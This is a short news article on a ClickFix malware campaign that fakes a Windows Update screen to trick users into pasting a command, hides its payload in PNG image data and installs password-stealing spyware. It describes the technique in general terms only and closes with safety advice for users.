Cybercriminals updated ClickFix malware to appear as an official Windows update, with the aim of tricking users into pasting a malicious command into the Run window.
The new version relies on an advanced trick that begins with using a PNG image containing hidden data that activates spy tools capable of stealing passwords, bank account data, digital currency wallets, and more.
Huntress researchers uncovered this new version after noticing that it displayed a full-screen browser page that exactly mimicked the Windows Update window, with a progress bar indicating 95% of a “serious security update.”
The software is often spread on fake adult sites that imitate popular ones, appearing in the form of an advertisement or an age verification window. Once you click on it, the fake update screen appears.
The software asks the user to press Windows + R and automatically paste a previously copied command, giving the hacker administrative access to the device.
After execution, the command launches the Windows built-in mshta tool using a malicious link that fetches the malicious payload from a hex-encoded address. PowerShell is also used with obfuscated code to disable security tools and prevent the attack from being detected.
The software then decrypts the PNG image and extracts malicious commands hidden within its pixel data, which it then injects into processes already running on the device. Then spy tools such as Rhadamanthys and LummaC2 are deployed, which collect passwords, personal data and keyboard traffic and send them to external servers.
The Huntress report indicated that this version has been spreading since the beginning of October, and that many sites are still hosting the fake update window with varying degrees of complexity.
Hackers usually resort to hiding code inside seemingly innocent images or inside codes full of randomness to confuse security researchers and hide their intentions.
This version of ClickFix is one of the most intelligent and dangerous data theft methods. Therefore, users are advised to avoid clicking on ads or running any unknown commands, in addition to always checking page links before interacting with them.
